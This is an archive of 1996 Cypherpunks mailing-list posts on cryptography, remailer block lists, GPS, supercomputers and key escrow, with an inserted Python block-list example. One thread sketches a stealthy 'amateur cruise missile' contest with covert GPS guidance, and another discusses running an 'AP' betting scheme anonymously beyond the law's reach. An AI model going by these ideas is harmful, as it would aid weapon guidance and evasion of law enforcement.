FUCKIN YOU WANT A REAL FELONY.. TRY > TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE > YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS. Charming. A juvenile refugee from alt.2600... EBD From pgut001 at cs.auckland.ac.nz Sun Sep 29 06:57:39 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Sun, 29 Sep 1996 21:57:39 +0800 Subject: Transforming variable-length to fixed keys Message-ID: <84399947820692@cs26.cs.auckland.ac.nz> >If the speed of your key generation is an issue, you could do something like: > > key[] = { 0 }; > const int nhashes = 4; > typedef void (*hashfnptr)(byte*, byte*, int); > /* array of hash functions */ > hashfnptr hash[ nhashes ] = { md5, sha1, haval, ... }; > > state = hash[ 0 ]( algorithm, mode, parameters, userKey ); > > for count = 1 to iterations > for length = 1 to keyLength (in hash_output_size blocks) > /* selecting a hash function based on the state */ > state = hash[ state % nhashes ]( state ); > key[ length ] = hash[ state % nhashes]( state, userKey ); > >This provides more expense in hardware for the same expense in software, so >for the same CPU time you get more hardware expense, and could reduce the >iterations for the same security. > >`nhashes' determined by the number of digest algorithms you consider >trustworthy. > >(They need hardware for `nhashes' different digest algorithms). > >You need to do something about resolving the differing output and state sizes. Yeah, that's a particularly evil way of making things harder for people with keysearch engines. That's why in cryptlib when I'm doing something like key exchange I encrypt all the parameters (algorithm, mode, etc etc) along with the session key, so an attacker can't even tell what algorithm you're using[1]. 
I'd thought of adding some sort of "choose a random algorithm and mode" capability to cryptlib, but the user interface was too difficult to handle (finding a way to let the user specify "We want a choice of DES-CFB, IDEA-OFB, DES-EDE-CBC, or Blowfish-PCBC" is a bit of a pain). In the end I took the easy way out by adding an extended initialisation mode which allows the user to specify the algorithm if they want, but left the possibility of one-algorithm-per-round hashing alone. A problem with using one of a fixed selection of algorithms is that as you add new modes the selection changes, so you need to add more state information to the key which specifies the choice of algorithms, which starts to get messy. I'd still love to add this in some form to keep the NSA amused... perhaps a bit vector of allowable algorithms and modes passed to the setup function. Peter. [1] There's a story from IBM when they were testing a new IBM-internal encryption system for long-haul telecoms applications. They were playing around with bouncing encrypted transmissions off an IBM-owned satellite when they were contacted by the NSA who said "You're not using DES. Stop it". From jya at pipeline.com Sun Sep 29 07:58:47 1996 From: jya at pipeline.com (John Young) Date: Sun, 29 Sep 1996 22:58:47 +0800 Subject: PET_ard Message-ID: <199609291316.NAA15248@pipe4.ny2.usa.pipeline.com> Sci, 20 Sept 1996: "Redefining the Supercomputer" The word is petaflops, computer jargon for 1000 trillion computations per second. Think of it as a year's labor for a powerful workstation compressed into 30 seconds. Think of it, also, as 1000 times the speed of the current computing benchmark, a trillion operations a second -- teraflops -- which is on the verge of becoming a reality at Sandia National Laboratories after 5 years of effort. 
Now the federal government's high-performance computing program is aiming for a petaflops, and researchers are exploring new technologies, sketching new architectures, and pondering the software challenge of harnessing this staggering computational power. The NSA is a petaflops enthusiast, says a researcher, but "we're not allowed to think about their applications." ----- http://jya.com/petard.txt (20 kb) PET_ard From gary at systemics.com Sun Sep 29 09:33:28 1996 From: gary at systemics.com (Gary Howland) Date: Mon, 30 Sep 1996 00:33:28 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: <324E8605.794BDF32@systemics.com> jim bell wrote: > > On a related issue, GPS (global-positioning system) contains a de-accurizing > mis-feature called S/A, which adds a little error to the location as > detected by a receiver. Ostensibly, it was added so that this could be > turned on in wartime, to deny the enemy the ability to make 10-meter fixes. > Turns out that it was kept on all the time, probably because if it WASN'T it > would become politically impossible to de-accurize the system even in wartime. Apparently S/A (selective availability) was turned *off* during the Gulf war. "Military Intelligence" in action. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From paul at fatmans.demon.co.uk Sun Sep 29 10:08:49 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 30 Sep 1996 01:08:49 +0800 Subject: [CRYPTO] (was: sig/noise ratio) Message-ID: <844009091.10211.0@fatmans.demon.co.uk> > > > > Items crypto related but missing the [CRYPTO] header could be > > reposted by well meaning souls. > > > > Other appropriate headers could of course be used. 
> > > > Brian Yeah, It`s sad that it`s got to this stage now but I support the idea anyway, I`ll start prefixing all my cryptographic code or technical postings with the headers. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From paul at fatmans.demon.co.uk Sun Sep 29 10:21:20 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 30 Sep 1996 01:21:20 +0800 Subject: Mousepad RNG's? Message-ID: <844009092.10210.0@fatmans.demon.co.uk> > I just downloaded a copy of the beta version of Datafellows > Windows 3.1 SSH and it asked to move the mouse around to > generate some randomness. In reading Applied Crypto, it > mentioned that there is no such thing as generating > randomness from a personal computer unless something like > a Geiger counter is used. Is there any way to create a > fairly random sample from the mouse? Should one use lots > of jerky movements, or take ones time with it? What applied crypto would have said was that one cannot generate randomness on a computer without reference to an external source, a mouse is as good as any, the real problem is generating random numbers using PRNGs (Pseudo random number generators) which are algorithms that produce statistically random data that may be predictable, in the words of John Von Neumann "Anyone who considers arithmetic methods of generating random numbers is in a state of sin" In brief, a mouse output would be acceptable, just move the mouse any old way around the screen and the data will be random enough for your uses...
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From dlv at bwalk.dm.com Sun Sep 29 11:18:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 02:18:35 +0800 Subject: Making Remailers Widespread [REMAILERS] In-Reply-To: <199609290623.XAA25604@dfw-ix3.ix.netcom.com> Message-ID: Bill Stewart writes: > >Unfortunately, one-way remailers have much fewer uses than two-way remailers > >any many of these uses are abusive. > > I agree, it's a problem; the return address seems to reduce abuse. It's not only a question of traceability... Most "useful" uses of Julf's remailer involved scenarios like someone posting anonymously to a public forum and soliciting replies, or someone contacting another party anonymously and wanting to receive a reply. It was pretty easy for two anonmous parties to establish a dialog. An optional reachable return address (even if the sender can't be traced back and be punished for abuse) makes the system so much more useful for things other than anonymous farting. > >> - A centralized block list (e.g. http://www.remailer.net/block.txt) > >> which all of the form-based remailers could load and reference would > >> allow non-picky operators not to have to handle it themselves > >A single centralized point of failure is bad. Maybe 4 or 5 redundant ones. > >A blocking request sent to one will be replicated in the other automatically > > Good point. A bit tough to implement in a no-brainer out-of-the-box remailer > you gain a bit by having the block list point to an address that's really > a round-robin DNS spinner of some sort, but that still leaves you with > centralization. 
How about: maintain a list of trusted blocking-list sites (comparable to the list of remailers used for chaining) and when it comes the time to update the local copy of the blocking list, ask a random one on the list; if it's down, ask another random one on the list. There may even be more than one list. :-) > >> - special-case for "postmaster", who may want to block > >> all of foo.domain instead of just postmaster at foo.domain > >> - special-special-case for postmasters of big sites, e.g. aol, net > >> who we may want to ignore? > > >I don't think it's a good idea to suport blocking receivers in an entire > >domain, like *@aol.com. Just say it's not supported. > > Blocking an entire domain like *@aol.com is mostly bad. > Blocking an entire domain like *@myconsultingfirm.com is fine. I think it's also bad, but I suppose the market wants it, so I'm showing below how this can be done. > >> - A sender-blocking list is harder, and may still take human attention > >I don't think it's a good idea to support sender blocking at all. > > There are some spammers you'd like to stop quickly when a Spam Event > is happening. There are broken email gateways that may need blocking. > There are known abusers you might want stopped. And there are folks like > president at whitehouse.gov who can be presumed to be forgeries :-) > A sender-blocking list administered by the Remailer Cabal* would be > a reasonable default for no-brainer remailers, and obviously it > should be possible for remailer-admins to override or ignore if they want. With most ISP's it's trivial to forge one's From: header in SMTP. Switching to another dime-a-dozen throwaway account is also trivial. Just admit that you can't block senders, and don't pretend that you can - false pretenses destroy one's credibility. Timmy the pathological liar posted a rant a few weeks ago on how "remailer operators can't be choose" - usually he's full of shit, but that time he had a point - he must have plagiarized it. 
> >Would the receiver blocking list be available to everyone to view? That > >sounds like a violation of privacy. Someone suggested on this list that > >(assuming that the entries are addresses that match exactly, not regular > >expressions), one can store hashes of addresses. > > That's worth doing, or at least thinking about seriously. > The most interesting regular expressions are *@domain (which you can > handle by keeping separate block lists for domains and full addresses > (or a merged list that the using remailer checks both)) and > *@*.domain and user@*.domain - e.g. alice at mailserver17.big-isp.com, > which would successfully deliver mail to alice at big-isp.com. > Perhaps the system needs to keep two hashes - hash(alice),hash(big-isp.com) > and check subsets of the domain name? This is creeping featurism, > but it may be the right way to go to set a good precedent. I think I see a way to accomplish this without too much trouble. When an e-mail is directed at u at c4.c3.c2...c1, the code that checks for blocking will search for the following records in the blocking list: u at c4.c3.c2...c1 (exact match) *@c4.c3.c2...c1 (replace user by *) u@*.c3.c2...c1 (replace leftmost .-separated piece of domain by *) *@*.c3.c2...c1 (both) and repeat until there are only 2 components left in the domain name. E.g., if a message is addressed to dlv at under.bwalk.dm.com, the blocking code would compute hashes of the following strings and check for each one's presence in the blocked list: dlv at under.bwalk.dm.com *@under.bwalk.dm.com dlv@*.bwalk.dm.com *@*.bwalk.dm.com dlv@*.dm.com *@*.dm.com and here we stop. This shouldn't take much more CPU time than the blocking code in Lance Cottrell's mixmaster that I just looked at, which loops through all blocking patterns and checks if each one matches. Now, the question is, who would be allowed to add records containing '*' to the blocking list using the cookie protocol?
I suggest that it be one of the contacts listed in Internic's database. E.g. joe at some.place.com can add himself to the blocking list using the cookie protocol. If joe tries to add *@*.place.com to the blocking list, the 'bot looks at Internic's database and sees only jim and jeff listed for place.com, so it refuses. On the other hand, jim at some.place.com can add *@*.place.com, joe@*.place.com, etc, because Internet says he's the admin for place.com. Thus a blocking record for cypherpunks at toad.com could be added by anyone listed in toad.com's Internic entry. There's no need for any Remailer Cabal [tinc] to maintain blocking lists. One other suggestion: instead of storing one bit of information (the address is on the list or not), why not have several flag bits. E.g., the blocking list could contain records similar to: hash - e.g. 160-bit SHA flags - e.g. reserve 32 bits If the list is sorted by hash, then using binary search to check whether a value is in it is very fast (much faster than matching wildcards). But at the same time you can retrieve the flags word, which could be used, e.g., to say that an address doesn't wish to block all incoming anonymous e-mail, but only e-mail that appears not to contain a reply block, or whatever other preferences can be stuffed into 32 bits. E.g., one could use 2 or 3 bits to specify the maximum size of a message to be delivered to addresses matching this pattern: 000 for no limit, and nnn for nnn*4K bytes. > One unfortunate result of only using hashed names and not > readable names is that it doesn't help the current remailer operators, > since their existing code doesn't work that way. This seems like a straightforward replacement for a small piece of code in Lance Cottrell's mixmaster (which remains to be written, of course :-). It's probably not hard to plug the same code into other remailers if they're well-written.
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Sun Sep 29 11:27:35 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 02:27:35 +0800 Subject: What about making re-mailers automatically chain? In-Reply-To: <199609290914.EAA09458@bluestem.prairienet.org> Message-ID: At 4:14 AM -0500 9/29/96, David E. Smith wrote: >I dunno about that one. Even if the message itself is encrypted, >every remailer has to have the address of the final recipient for >your plan to work. And if you have cleartext for that message ... Actually, as I read the original proposal, it was to only _insert_ additional links. Thus, imagine the following remailer chain, with Alice sending to Zeke through a chain, represented in parentheses (like LISP): Bob(Charles(Dora(Ed(Frank(........Zeke))))....) (All messages are encrypted, etc.) Now, imagine that Charles elects to add two additional chains, XXXX and YYYY (to make them stand out in my representation). From his point on, the chain will look like: (XXXX(YYYY(Dora(Ed(Frank(........Zeke))))....) Likewise, any of the later remailers can add more links, etc. Some dangers are that "lost Dutchman" messages will remain in the system forever. This gets fixed by probabilistic criteria, to produce convergence. Or with digital postage, which causes convergence for ontological reasons. Adding new links, or adding "middleman" links, is always possible. We've had several discussions of this over the years. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
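Added example (not part of any message in this archive): the hashed blocking-list lookup that Dimitri Vulis describes in the "Making Remailers Widespread" message above, written in Python. The flag bit assignments, the lowercasing of addresses and the rule that the most specific matching record wins are assumptions; the post only fixes the pattern sequence, a 160-bit SHA hash and a 32-bit flags word.

```python
import bisect
import hashlib

# Flag layout is an assumption. The post only reserves 32 bits and suggests
# a 3-bit size limit (000 = no limit, nnn = nnn*4K bytes).
SIZE_MASK = 0b111            # bits 0-2: maximum message size in 4K units
BLOCK_ALL = 1 << 3           # refuse all anonymous mail
NEED_REPLY_BLOCK = 1 << 4    # refuse only mail that carries no reply block


def candidate_patterns(address):
    """Patterns to look up for one recipient, most specific first."""
    user, sep, domain = address.strip().lower().rpartition("@")
    if not sep or not user or not domain:
        raise ValueError("not a user@domain address: %r" % address)
    labels = domain.split(".")
    patterns = [f"{user}@{domain}", f"*@{domain}"]
    # Replace the leftmost domain label by '*' until two labels remain.
    while len(labels) > 2:
        labels = labels[1:]
        tail = ".".join(labels)
        patterns += [f"{user}@*.{tail}", f"*@*.{tail}"]
    return patterns


def pattern_hash(pattern):
    """160-bit SHA-1 digest of a pattern string, as the post suggests."""
    return hashlib.sha1(pattern.encode("utf-8")).digest()


def build_blocklist(entries):
    """entries maps pattern -> flags; returns parallel lists sorted by hash."""
    records = sorted((pattern_hash(p.lower()), f & 0xFFFFFFFF)
                     for p, f in entries.items())
    return [h for h, _ in records], [f for _, f in records]


def lookup(blocklist, address):
    """Return (pattern, flags) for the most specific record, or None."""
    hashes, flags = blocklist
    for pattern in candidate_patterns(address):
        h = pattern_hash(pattern)
        i = bisect.bisect_left(hashes, h)      # binary search on sorted hashes
        if i < len(hashes) and hashes[i] == h:
            return pattern, flags[i]
    return None


def may_deliver(blocklist, address, size_bytes, has_reply_block):
    """Apply the flags word of the matching record to one message."""
    hit = lookup(blocklist, address)
    if hit is None:
        return True
    _, flags = hit
    if flags & BLOCK_ALL:
        return False
    if flags & NEED_REPLY_BLOCK and not has_reply_block:
        return False
    limit = (flags & SIZE_MASK) * 4096
    return limit == 0 or size_bytes <= limit


# Constructed sample list; only the dm.com names come from the post.
SAMPLE = build_blocklist({
    "*@*.dm.com": BLOCK_ALL,
    "dlv@*.bwalk.dm.com": NEED_REPLY_BLOCK | 2,   # reply block needed, max 8K
    "*@example.org": 1,                           # max 4K
})

if __name__ == "__main__":
    for p in candidate_patterns("dlv@under.bwalk.dm.com"):
        print(p, pattern_hash(p).hex())
    print(may_deliver(SAMPLE, "dlv@under.bwalk.dm.com", 1000, True))
```

Unsalted hashes of mail addresses can still be confirmed by anyone who hashes a guessed address, so publishing the list in this form hides it from casual reading only.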
"National borders aren't even speed bumps on the information superhighway." From paul at fatmans.demon.co.uk Sun Sep 29 12:01:15 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 30 Sep 1996 03:01:15 +0800 Subject: Mousepad RNG's? Message-ID: <844013772.1731.0@fatmans.demon.co.uk> > At 8:13 PM -0700 9/27/96, James A. Donald wrote: > >Some time ago, at a cypherpunks conference, people were making >all sorts of ridiculous proposals for being really, really, >really, sure that you had real entropy, and a prominent >cypherpunk, possibly Tim May, said, "This is ridiculous: >Nobody ever broke good crypto through weakness in the >source of truly random numbers". Sometime after that >Netscape was broken through weakness in the source of >truly random numbers. This is correct only in the first part, it is true that good cryptography has never been documentably broken through weaknesses in a real random source. The netscape attack was on the PRNG used in netscape, the proverbial state of sin. I don`t know what PRNG netscape used in the broken version, can anyone tell me what they used, and whether it was the PRNG or the seed that was weak, also I would be interested to know what they are using now in terms of the algorithm and seed... 
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From jimbell at pacifier.com Sun Sep 29 12:05:41 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 30 Sep 1996 03:05:41 +0800 Subject: crypto anarchy vs AP Message-ID: <199609291655.JAA28141@mail.pacifier.com> At 04:21 PM 9/29/96 +0200, Gary Howland wrote: >jim bell wrote: >> >> On a related issue, GPS (global-positioning system) contains a de-accurizing >> mis-feature called S/A, which adds a little error to the location as >> detected by a receiver. Ostensibly, it was added so that this could be >> turned on in wartime, to deny the enemy the ability to make 10-meter fixes. >> Turns out that it was kept on all the time, probably because if it WASN'T it >> would become politically impossible to de-accurize the system even in wartime. > >Apparently S/A (selective availability) was turned *off* during the Gulf >war. "Military Intelligence" in action. Yes, because of lack of enough S/A-capable military receivers... They were stuck with using the commercial, off-the-shelf kind. Jim Bell jimbell at pacifier.com From tcmay at got.net Sun Sep 29 12:20:44 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 03:20:44 +0800 Subject: Use of Consumer-grade GPS units in Gulf War In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: At 4:21 PM +0200 9/29/96, Gary Howland wrote: >jim bell wrote: >> >> On a related issue, GPS (global-positioning system) contains a de-accurizing >> mis-feature called S/A, which adds a little error to the location as >> detected by a receiver. Ostensibly, it was added so that this could be >> turned on in wartime, to deny the enemy the ability to make 10-meter fixes. 
>> Turns out that it was kept on all the time, probably because if it WASN'T it >> would become politically impossible to de-accurize the system even in >>wartime. > >Apparently S/A (selective availability) was turned *off* during the Gulf >war. "Military Intelligence" in action. Actually, there were excellent reasons. First, there was no evidence the Iraqis had any ability to use GPS of any sort (I suspect the odd unit existed in Iraq, but not enough of them to be useful in any meaningful sense.) Second, the military bought a huge pile of _consumer_-grade GPS units, e.g., from Trimble Navigation, to fill a shortage of military-grade units (because of the rapid build-up in ground forces). The reasons for turning off S/A made perfect sense. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sun Sep 29 12:36:14 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 03:36:14 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) In-Reply-To: <199609291316.NAA15248@pipe4.ny2.usa.pipeline.com> Message-ID: (Hoist by their own petards indeed! Don't tell our Russian what petard means.) At 1:16 PM +0000 9/29/96, John Young wrote: > Sci, 20 Sept 1996: > > "Redefining the Supercomputer" > > The word is petaflops, computer jargon for 1000 > trillion computations per second. Think of it as a > year's labor for a powerful workstation compressed > into 30 seconds. 
Think of it, also, as 1000 times the > speed of the current computing benchmark, a trillion > operations a second -- teraflops -- which is on the ... I doubt this will be ever be built, at least not as a government-funded "G-job" "one-off" machine. It would, as the full article state, necessitate a kind of "Apollo program" for supercomputers. This, as funding for mega-projects fades. This, as Cray Computer went bankrupt, as Thinking Machines went into Chapter 11 and only recently emerged as a pale shadow of its former self (concentrating on software only), and as Floating Point Systems, NCube, MasPar, etc. are foundering. (Actually, some have already been absorbed into other companies, and in many cases, dissolved. I think FPS was absorbed...) (I could go on...Elxsi, Denelcor, Steve Chen's supercomputer company, Control Data Corporation (pulled the plug on its supercomputers years ago), etc. Probably two dozen companies have tried to enter the "next generation supercomputer" business....) Cray Research (not to be confused with Cray Computer, of course) is now a unit of Silicon Graphics. And my old employer, Intel, is now struggling with its "Supercomputer" business unit (which was once doing moderately well, and was even the performance leader for a while, but which is now being scaled back....) The reasons for the collapse of the market are well-known: the end of communism has lessened certain needs, the cut-backs in defense spending, "the attack of the killer micros" (arrays of cheap micros give better bang-for-the-buck), and, related to the themes of this list, NSA's code-breaking just ain't what it used to be. To wit, if even a petaflops machine, costing billions of dollars and needing a nuclear power plant to power it, cannot make headway on cracking a garden-variety PGP-encrypted message..... (I grant that computers, supercomputers, workstations, arrays of special-purpose hardware, etc. 
are useful for all sorts of related things, such as signals analysis, filtering of voices, recognition of voices, traffic analysis, etc. But I rather doubt that a single petaflops machine is a good way to go for this.) The "speculative" applications--the "miraworld" simulation environment, for example--are nonsensical. There is no reason for a multibillion dollar petaflops machine to be built so that researchers can schedule a few minutes on it! (They'd rather have 0.1% the peak performance, but constant or assured access, I'm sure.) And so on. I don't see it happening. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From azur at netcom.com Sun Sep 29 13:01:49 1996 From: azur at netcom.com (Steve Schear) Date: Mon, 30 Sep 1996 04:01:49 +0800 Subject: GPS and other Dual-use technologies Message-ID: I used to be an avid RC modeler and have contemplated organizing an on-going amateur cruise missile contest. The object would be to accurately deliver various payload weights over courses of various terrain and distances (perhaps out to a hundred miles or more in the case of Giant Scale craft). Judging would be based on speed, stealth (noise, IR emissions and radar cross section) and accuracy. Craft are free to use any navigational technology, but must be autonomous from launch to delivery. To aid navigation I was considering the design of a substitute differential GPS beacon functionally interchangable with those offered by the USCG. 
My device would work on a different frequency, possibly using very wideband direct sequence spread spectrum (for low probability of intercept/detection) and be actuated by the missile as it neared the target in order to refine its position. -- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear | Internet: azur at netcom.com Lamarr Labs | Voice: 1-702-658-2654 7075 West Gowan Road | Fax: 1-702-658-2673 Suite 2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- From wombat at mcfeely.bsfs.org Sun Sep 29 14:00:25 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Mon, 30 Sep 1996 05:00:25 +0800 Subject: [RANT] Re: Workers, Public Schools, Tradesmen, and Justice In-Reply-To: <19960929055435234.AAA224@GIGANTE> Message-ID: > The old way was that your HS provided what the mythical average person needed > to go about life. College was for the more "complex" careers. Perhaps "high school" should end at age 16, with two years of publicly funded "junior college" or "technical school" available to those who select one or the other, and qualify. This would bring an adult-level decision earlier in life, and students would need to start thinking about which path to chose at about 14. Perhaps this would allow reality to set in at an earlier age. A high school diploma has become meaningless anyway - it is viewed as a "right." This wouldn't leave anyone condemned to a life of menial labor for a decision made at age 16 - there are plenty of successful people who have obtained a G.E.D. later in life, and then gone on to college. It would, however, give some measure of responsibility to the near-adult. In my own education, I found that I was getting nothing out of high school by age 16. I wanted to drop out of high school to start college, but my parents wouldn't hear of it. 
I got into an internship-for-credit program instead, and got out w/ diploma and started college a semester later. My fiance did drop out of high school at age 16 and started college, with her parent's blessing. All her high school guidence counselor could come up with was "But she'll miss her prom"! It seemed that the last two years of high school were devoted to trying to drag marginal, apathetic students towards their diploma, kicking and screaming. Anyone "college bound" was just marking time. I wouldn't want my children subjected to this - I'd rather they got into college as soon as they were ready, diploma or not. Just my $.02 -r.w. From Scottauge at aol.com Sun Sep 29 14:01:29 1996 From: Scottauge at aol.com (Scottauge at aol.com) Date: Mon, 30 Sep 1996 05:01:29 +0800 Subject: Key-Escrow Message-ID: <960929141327_113858214@emout06.mail.aol.com> I have a question. There seems to be a lot of excitement over the key escrow stuff da gubermint is trying to install. Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these are like, gonna be my keys. Wouldn't this place them into a brute force search if they wanted to play with your info? Doing this will likely add to the tax burden for all dem disk drives needed to store them numbers. :( If ya can't do that, then they must be gonna sell key space like da radio spectrm - which means some number is gonna mean something to someone somewhere - yum yum say the hackers and the crackers. I'm thinking there will be a way no matter what happens.... From jimbell at pacifier.com Sun Sep 29 14:25:22 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 30 Sep 1996 05:25:22 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <199609291850.LAA03605@mail.pacifier.com> At 10:00 AM 9/29/96 -0800, Timothy C. May wrote: >(Hoist by their own petards indeed! Don't tell our Russian what petard means.) Uh, wasn't that the name of the bald captain on Star Trek Next Generation? 
You know, "Jean-Luc Petard"? >> The word is petaflops, computer jargon for 1000 >> trillion computations per second. Think of it as a >> year's labor for a powerful workstation compressed >> into 30 seconds. Think of it, also, as 1000 times the >> speed of the current computing benchmark, a trillion >> operations a second -- teraflops -- which is on the >... > >I doubt this will be ever be built, at least not as a government-funded >"G-job" "one-off" machine. It would, as the full article state, necessitate >a kind of "Apollo program" for supercomputers. Check out an article in about the September issue of Scientific American, 1966, on the subject of the Illiac IV, which was one of the first attempts at a multiprocessor machine. Originally it was conceived as a 256-processor unit, at 4 million (floating point?) operations per second per processor which would have been 1 giga ops per second, but it was eventually built as a 64-processor unit and turned on in about 1972 or so. The succeeding factor-of-1000 improvement appears (if the item above is accurate) to have taken 24 years to accomplish, so it's hard to imagine that the next factor of 1000 will arrive appreciably sooner than year 2020. >The reasons for the collapse of the market are well-known: the end of >communism has lessened certain needs, the cut-backs in defense spending, >"the attack of the killer micros" (arrays of cheap micros give better >bang-for-the-buck), and, related to the themes of this list, NSA's >code-breaking just ain't what it used to be. Oddly enough, however, we're getting somewhat of an echo of the "big single processor" phenomenon with the micros. We all know that in supercomputers, multiprocessors won out over single processors, and mainframes were just about defeated by microcomputers. Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz chip for about $135, while they sell a 200-megahertz version for around $550 or so. 
Arithmetic suggests that a person would be far better off with a 4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single, 200-megahertz version. (admittedly, peripheral logic costs will adjust this a little.) Of course, this would also leave Intel flat on its ass attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed per cpu is just about the only advantage they have. Jim Bell jimbell at pacifier.com From aba at dcs.ex.ac.uk Sun Sep 29 14:33:17 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Mon, 30 Sep 1996 05:33:17 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: <199609291053.LAA00388@server.test.net> Jim Bell writes: > At 02:06 PM 9/26/96 -0500, snow wrote: > >Adam Back wrote: > >> [...] > >> More specifically perhaps they would disconnect key backbones, and > >> ISPs briefly while they rushed into effect a few presidential decrees > >> outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, > >> etc.) > > > > This would be cutting their own throats. There is SO much commercial > >and government traffic going across "The Net" that many businesses would > >scream bloody murder, and the government would have MASSIVE trouble with > >it's agenda. > > Yes, that "they'll cut off the Internet!" talk doesn't seem to be very > practical. Society very quickly develops dependency on inventions. Try to > take away their computers and they'd scream; take away their telephone and > it'd be worse! Give Internet another couple of years and 50% of big > business would be severely impacted should it be cut off. Wait five years > and the world would practically stop rotating without Internet. Maybe so. However I suggested that they would more likely outlaw non GAK crypto, anonymous ecash, remailers, PGP, etc. Perhaps I should read your later AP essay in case you have already countered my practicality objections.
(Do you have AP on the www somewhere?),

We've seen people suggest that you couldn't get away with AP, by claiming that the gambling was legal. (They'd get you for interstate gambling, conspiracy probably other things). So, it seems to me that your only approach is to do the whole thing anonymously. That requires anonymous ecash (payee and payor anonymous). This means that the anonymous ecash bank will be shutdown by the government as soon as it becomes apparent what is going on. Remailer operators are similar soft targets.

The best you could do I think is this. Publish a PGP public key, and software or specifications for a robust steganographic encoding for AP bets. That would take care of communication. You still have the ecash problem. What do you suggest?

Adam

From jimbell at pacifier.com Sun Sep 29 14:35:04 1996
From: jimbell at pacifier.com (jim bell)
Date: Mon, 30 Sep 1996 05:35:04 +0800
Subject: GPS and other Dual-use technologies
Message-ID: <199609291915.MAA04736@mail.pacifier.com>

At 10:34 AM 9/29/96 -0700, Steve Schear wrote:
>I used to be an avid RC modeler and have contemplated organizing an
>on-going amateur cruise missile contest. The object would be to accurately
>deliver various payload weights over courses of various terrain and
>distances (perhaps out to a hundred miles or more in the case of Giant
>Scale craft). Judging would be based on speed, stealth (noise, IR
>emissions and radar cross section) and accuracy.
>
>Craft are free to use any navigational technology, but must be autonomous
>from launch to delivery. To aid navigation I was considering the design of
>a substitute differential GPS beacon functionally interchangeable with those
>offered by the USCG. My device would work on a different frequency,
>possibly using very wideband direct sequence spread spectrum (for low
>probability of intercept/detection) and be actuated by the missile as it
>neared the target in order to refine its position.
The data standard for differential corrections is called "RTCM-104", and it's the signal you input into differential-capable GPS receivers. Boxes to generate RTCM-104 are probably relatively cheap, primarily needing a multi-channel GPS receiver and another processor for coding. Differential corrections can, of course, be transmitted on any frequency you'd like, including frequency-hopping if you're really concerned about intercept. (which you won't be...)

Incidentally, GPS receivers are getting REALLY small these days, particularly for just the module-level products. A size like about 1 inch by 2-inches is pretty close to state-of-the-art. Power consumption is about 3/4 watt.

Jim Bell
jimbell at pacifier.com

From whallen at capitalnet.com Sun Sep 29 14:36:12 1996
